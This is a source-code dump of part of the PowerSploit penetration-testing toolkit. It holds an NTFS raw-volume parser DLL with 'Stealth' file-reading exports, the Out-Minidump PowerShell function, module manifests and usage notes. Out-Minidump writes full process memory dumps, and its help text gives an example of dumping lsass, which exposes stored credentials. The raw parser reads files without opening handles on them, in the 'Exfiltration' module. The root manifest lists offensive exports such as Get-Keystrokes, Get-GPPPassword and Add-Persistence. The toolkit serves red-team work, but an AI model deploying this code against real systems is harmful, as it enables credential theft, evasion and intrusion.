13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_DataType.h"
21 |
22 | using namespace std;
23 |
// State behind the opaque HANDLE that StealthOpenFile returns and that
// StealthReadFile / StealthCloseFile take back. volume, fileRecord and
// indexEntry are allocated with new in StealthOpenFile; data is whatever
// CFileRecord::FindStream() returned for the target file.
struct FileInfo_t
{
	CNTFSVolume* volume;       // NTFS volume selected by the path's drive letter
	CFileRecord* fileRecord;   // MFT record walker; ends on the target file's record
	CIndexEntry* indexEntry;   // index entry reused for each directory-component lookup
	CAttrBase* data;           // target file's data attribute; NULL when FindStream() found none
};
31 |
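// Frees a partially or fully built FileInfo_t on a StealthOpenFile failure path.
// `data` is never assigned before a failure return, so it is not touched here;
// the successful-open case is released by StealthCloseFile. Every member is
// NULL-initialised by StealthOpenFile, so deleting an unset one is a no-op.
static void DiscardFileInfo(FileInfo_t* fileInfo)
{
	if (fileInfo == NULL)
	{
		return;
	}
	delete fileInfo->fileRecord;
	delete fileInfo->indexEntry;
	delete fileInfo->volume;
	delete fileInfo;
}

// Locates a file by parsing the volume's NTFS structures directly (MFT root,
// then one index lookup per path component) instead of opening it through the
// Win32 file API — presumably why the export is called "Stealth": no file
// handle is ever taken on the target.
//
// filePathCStr: drive-letter-prefixed path such as "c:\dir\file.txt". The first
//   character selects the volume; components are split on '\\' only (forward
//   slashes are not recognised).
// Returns a FileInfo_t* (handed to callers as an opaque HANDLE) to pass to
//   StealthReadFile / StealthCloseFile, or NULL on any failure: NULL/empty path,
//   volume not readable, a component not found, or a record that cannot be
//   parsed (compressed or encrypted directories fall under this). No further
//   error detail is exposed.
//
// Every failure path previously leaked fileInfo and whatever had been allocated
// into it; DiscardFileInfo now releases them.
extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr)
{
	// An empty path would make filePath.at(0) throw, and a C++ exception must not
	// escape a C export.
	if (filePathCStr == NULL || filePathCStr[0] == '\0')
	{
		return NULL;
	}

	FileInfo_t* fileInfo = new FileInfo_t;
	fileInfo->volume = NULL;
	fileInfo->fileRecord = NULL;
	fileInfo->indexEntry = NULL;
	fileInfo->data = NULL;

	string filePath = string(filePathCStr);
	_TCHAR volumeName = filePath.at(0);

	// Opening the raw volume is what IsVolumeOK reports on; presumably this needs
	// administrative rights, but that is decided inside CNTFSVolume.
	fileInfo->volume = new CNTFSVolume(volumeName);
	if (!fileInfo->volume->IsVolumeOK())
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// Start at the MFT root directory; only index attributes are needed while
	// descending through directories.
	fileInfo->fileRecord = new CFileRecord(fileInfo->volume);
	fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION);
	if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT) || !fileInfo->fileRecord->ParseAttrs())
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	fileInfo->indexEntry = new CIndexEntry;

	// (dirs, dire) bracket the current directory component, exclusive on both
	// ends. size_t keeps the comparison with string::npos well-defined; the
	// original held these in int and relied on -1 converting back to npos.
	// When the path has no backslash, dirs is npos and dirs+1 wraps to 0.
	size_t dirs = filePath.find(_T('\\'), 0);
	size_t dire = filePath.find(_T('\\'), dirs+1);

	while (dire != string::npos)
	{
		string pathname = filePath.substr(dirs+1, dire-dirs-1);
		// NOTE(review): this cast reinterprets a narrow std::string buffer as
		// _TCHAR*. It is only correct when _TCHAR is char (non-Unicode build); with
		// wchar_t it would hand FindSubEntry a mis-typed buffer. Kept as in the
		// original — confirm the project's character set.
		const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str();
		if (!fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry)))
		{
			DiscardFileInfo(fileInfo);
			return NULL;
		}

		// Compressed or encrypted directories fail ParseAttrs as well; the
		// original tested IsCompressed()/IsEncrypted() here but returned NULL in
		// every branch, so a single failure path is equivalent.
		if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference())
			|| !fileInfo->fileRecord->ParseAttrs())
		{
			DiscardFileInfo(fileInfo);
			return NULL;
		}

		dirs = dire;
		dire = filePath.find(_T('\\'), dirs+1);
	}

	// Last component is the file itself. substr to end of string; the original
	// passed size()-1 as the length, which dropped the final character for a
	// path with no backslash at all.
	string fileName = filePath.substr(dirs+1);
	const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str();   // same _TCHAR caveat as above
	if (!fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry)))
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}
	if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// From here only the $DATA attribute matters.
	fileInfo->fileRecord->SetAttrMask(MASK_DATA);
	if (!fileInfo->fileRecord->ParseAttrs())
	{
		DiscardFileInfo(fileInfo);
		return NULL;
	}

	// May be NULL if the record has no unnamed data stream; StealthReadFile
	// reports that as return code 2 rather than failing the open.
	fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream();

	return fileInfo;
}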
122 |
123 |
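// Reads up to bufferSize bytes of the file's data attribute, starting at offset.
//
// fileInfo:      handle from StealthOpenFile. NULL (a failed open passed straight
//                through) is now rejected instead of dereferenced.
// buffer:        destination of at least bufferSize bytes.
// offset:        byte position in the file's data to start from.
// bytesRead:     out; number of bytes placed in buffer on success.
// dataRemaining: out; bytes of the file left after this read on success.
//
// Return codes: 0 success; 1 offset lies beyond the end of the data;
// 2 the file has no data stream; 3 the underlying ReadData failed or came up
// short; 4 a required pointer argument is NULL.
//
// The original computed dataLength - offset without checking offset first, so an
// offset past the end underflowed to a huge length (then clamped to bufferSize).
// Its later `dataLength > MAXUINT32` test could never fire after the clamp to a
// DWORD bufferSize; code 1 is reused for the offset check.
extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining)
{
	if (fileInfo == NULL || buffer == NULL || bytesRead == NULL || dataRemaining == NULL)
	{
		return 4;
	}
	if (fileInfo->data == NULL)
	{
		return 2;
	}

	ULONGLONG fullDataLength = (ULONGLONG)fileInfo->data->GetDataSize();
	if (offset > fullDataLength)
	{
		return 1;
	}

	ULONGLONG dataLength = fullDataLength - offset;
	if (dataLength > bufferSize)
	{
		dataLength = bufferSize;
	}
	// dataLength <= bufferSize (a DWORD), so this narrowing is lossless.
	DWORD toRead = (DWORD)dataLength;

	DWORD len = 0;
	// A short read is treated as a failure, as before; the out-parameters are
	// only written on success.
	if (!fileInfo->data->ReadData(offset, buffer, toRead, &len) || len != toRead)
	{
		return 3;
	}

	*bytesRead = len;
	*dataRemaining = fullDataLength - offset - len;
	return 0; //Success
}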
153 |
154 |
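// Releases the handle returned by StealthOpenFile.
//
// fileInfo: handle from StealthOpenFile; NULL (a failed open) is accepted and
//           ignored, where the original dereferenced it.
//
// The set and order of deletions are kept from the original. fileRecord,
// allocated in StealthOpenFile, is not freed here and therefore leaks. It is
// left alone on purpose: `data` comes from CFileRecord::FindStream() through a
// cast, which suggests the record may own that attribute — if so, freeing both
// data and fileRecord would be a double free. TODO(review): confirm ownership in
// NTFS_FileRecord.h, then either `delete fileInfo->fileRecord` here in addition
// to data, or drop `delete fileInfo->data` and free only the record.
extern "C" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo)
{
	if (fileInfo == NULL)
	{
		return;
	}
	delete (fileInfo->data);
	delete (fileInfo->indexEntry);
	delete (fileInfo->volume);
	delete fileInfo;
}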
162 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParserDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParserDLL application.
9 |
10 |
11 | NTFSParserDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParserDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParserDLL.cpp
25 | This is the main DLL source file.
26 |
Unlike a freshly generated wizard DLL, this project does export symbols: the
C-linkage functions StealthOpenFile, StealthReadFile and StealthCloseFile in
NTFSParserDLL.cpp. The build therefore produces an import library (.lib) that
other projects can link against. The test harness in NTFSParser.cpp does not
use it; it loads the DLL at run time with LoadLibrary/GetProcAddress instead.
(The wizard's advice to set the Ignore Input Library property to Yes on the
General property page of the Linker folder applies only to DLLs with no exports.)
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
// DLL entry point for NTFSParserDLL.
//
// Nothing is initialised or torn down on any loader notification: process
// attach/detach and thread attach/detach all fall through to the same success
// return so the loader keeps the module mapped. The parameters are unused.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;
    (void)ul_reason_for_call;   // DLL_PROCESS_ATTACH/DETACH, DLL_THREAD_ATTACH/DETACH: all no-ops
    (void)lpReserved;
    return TRUE;
}
36 |
37 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/Out-Minidump.ps1:
--------------------------------------------------------------------------------
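function Out-Minidump
{
<#
.SYNOPSIS

Generates a full-memory minidump of a process.

PowerSploit Function: Out-Minidump
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Out-Minidump writes a process dump file with all process memory to disk.
This is similar to running procdump.exe with the '-ma' switch. The dump is
produced by calling MiniDumpWriteDump through the non-public
WindowsErrorReporting.NativeMethods type that ships inside
System.Management.Automation, so no additional binary is required.

The resulting file contains the complete memory of the target process,
including any credentials, keys or tokens the process holds. Protect the
output accordingly and delete it when it is no longer needed.

.PARAMETER Process

Specifies the process for which a dump will be generated. The process object
is obtained with Get-Process.

.PARAMETER DumpFilePath

Specifies the directory where dump files will be written. By default, dump
files are written to the current working directory. Dump file names take the
following form: processname_id.dmp. An existing file with that name is
overwritten.

.EXAMPLE

Out-Minidump -Process (Get-Process -Id 4293)

Description
-----------
Generate a minidump for process ID 4293.

.EXAMPLE

Get-Process lsass | Out-Minidump

Description
-----------
Generate a minidump for the lsass process. Note: To dump lsass, you must be
running from an elevated prompt.

.EXAMPLE

Get-Process | Out-Minidump -DumpFilePath C:\temp

Description
-----------
Generate a minidump of all running processes and save them to C:\temp.

.INPUTS

System.Diagnostics.Process

You can pipe a process object to Out-Minidump.

.OUTPUTS

System.IO.FileInfo

The file object for each dump that was written successfully.

.NOTES

If MiniDumpWriteDump fails (or the reflective call itself throws), the
partially written dump file is removed and a terminating error is raised
carrying the Win32 error message and the process name and ID. A partial
dump is written, for example, when 32-bit PowerShell tries to dump a
64-bit process.

.LINK

http://www.exploit-monday.com/
#>

    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
        [System.Diagnostics.Process]
        $Process,

        [Parameter(Position = 1)]
        [ValidateScript({ Test-Path $_ })]
        [String]
        $DumpFilePath = $PWD
    )

    BEGIN
    {
        # MiniDumpWriteDump is not exposed publicly; reuse the P/Invoke
        # declaration PowerShell itself carries for Windows Error Reporting.
        $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
        $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
        $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
        $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)

        # Fail early with a clear message if the reflective lookup found nothing,
        # rather than with a null-method error on the first process.
        if (-not $MiniDumpWriteDump)
        {
            throw 'Unable to locate the non-public MiniDumpWriteDump declaration in System.Management.Automation.'
        }

        # MINIDUMP_TYPE value MiniDumpWithFullMemory (0x2).
        $MiniDumpWithFullMemory = [UInt32] 2
    }

    PROCESS
    {
        $ProcessId = $Process.Id
        $ProcessName = $Process.Name
        # Reading .Handle opens the process; this throws when access is denied.
        $ProcessHandle = $Process.Handle
        $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"

        $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName

        $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
        $Result = $False
        $ErrorCode = 0
        $InvokeError = $null

        try
        {
            $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
                                                         $ProcessId,
                                                         $FileStream.SafeFileHandle,
                                                         $MiniDumpWithFullMemory,
                                                         [IntPtr]::Zero,
                                                         [IntPtr]::Zero,
                                                         [IntPtr]::Zero))

            # Capture the Win32 error immediately: closing the stream (or any
            # other call) before reading it could overwrite the last-error value.
            if (-not $Result)
            {
                $ErrorCode = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
            }
        }
        catch
        {
            # The reflective call itself failed; treat it like a failed dump so
            # the partial file is cleaned up below, then surface the original error.
            $Result = $False
            $InvokeError = $_
        }
        finally
        {
            # Always release the file handle, even on failure, so the partial
            # file is not left open and locked.
            $FileStream.Close()
        }

        if (-not $Result)
        {
            # Remove any partially written dump files. For example, a partial dump will be written
            # in the case when 32-bit PowerShell tries to dump a 64-bit process.
            Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue

            if ($InvokeError)
            {
                throw $InvokeError
            }

            $Exception = New-Object ComponentModel.Win32Exception($ErrorCode)
            $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"

            throw $ExceptionMessage
        }

        Get-Item $ProcessDumpPath
    }

    END {}
}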
131 |
--------------------------------------------------------------------------------
/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Exfiltration`
7 |
8 | To see the commands imported, type `Get-Command -Module Exfiltration`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | PowerSploit is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2012, Matthew Graeber
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
@{

# Manifest for the PowerSploit Mayhem module. The matching entry in the
# root PowerSploit.psd1 ModuleList must use this GUID and version.

# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Mayhem.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Mayhem Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# '*' exports every function Mayhem.psm1 defines; no explicit allow-list.
FunctionsToExport = '*'

# List of all files packaged with this module
FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'

}

31 |
--------------------------------------------------------------------------------
/Mayhem/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Mayhem`
7 |
8 | To see the commands imported, type `Get-Command -Module Mayhem`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
@{

# Manifest for the PowerSploit Persistence module. The root PowerSploit.psd1
# ModuleList references this module by the GUID and version below.

# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Persistence.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = '633d0f10-a056-41da-869d-6d2f75430195'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Persistence Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# '*' exports every function Persistence.psm1 defines; no explicit allow-list.
FunctionsToExport = '*'

# List of all files packaged with this module
FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'

}

31 |
--------------------------------------------------------------------------------
/Persistence/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Persistence folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Persistence`
7 |
8 | To see the commands imported, type `Get-Command -Module Persistence`
9 |
10 | For help on each individual command, Get-Help is your friend.
--------------------------------------------------------------------------------
/PowerSploit.psd1:
--------------------------------------------------------------------------------
@{
# Root manifest for PowerSploit. PowerSploit.psm1 imports every sub-folder
# (except Tests) as a nested module; this manifest lists which of their
# functions are exported from the root module.

# Script module or binary module file associated with this manifest.
ModuleToProcess = 'PowerSploit.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = '6753b496-d842-40a3-924a-0f09e248640c'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers and red team operator during all phases of an engagement.'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# NOTE(review): this list must be kept in sync with the sub-module manifests.
# Privesc.psd1 exports 'Get-CachedGPPPassword', which is not listed here and
# is therefore not exported from the root module; confirm whether that is
# intended.
FunctionsToExport = @(
'Add-NetUser',
'Add-ObjectAcl',
'Add-Persistence',
'Add-ServiceDacl',
'Convert-NameToSid',
'Convert-NT4toCanonical',
'Convert-SidToName',
'Copy-ClonedFile',
'Find-AVSignature',
'Find-ComputerField',
'Find-ForeignGroup',
'Find-ForeignUser',
'Find-GPOComputerAdmin',
'Find-GPOLocation',
'Find-InterestingFile',
'Find-LocalAdminAccess',
'Find-PathDLLHijack',
'Find-ProcessDLLHijack',
'Find-ManagedSecurityGroups',
'Find-UserField',
'Get-ADObject',
'Get-ApplicationHost',
'Get-CachedRDPConnection',
'Get-ComputerDetails',
'Get-ComputerProperty',
'Get-CurrentUserTokenGroupSid',
'Get-DFSshare',
'Get-DomainPolicy',
'Get-ExploitableSystem',
'Get-GPPPassword',
'Get-HttpStatus',
'Get-Keystrokes',
'Get-LastLoggedOn',
'Get-ModifiablePath',
'Get-ModifiableRegistryAutoRun',
'Get-ModifiableScheduledTaskFile',
'Get-ModifiableService',
'Get-ModifiableServiceFile',
'Get-NetComputer',
'Get-NetDomain',
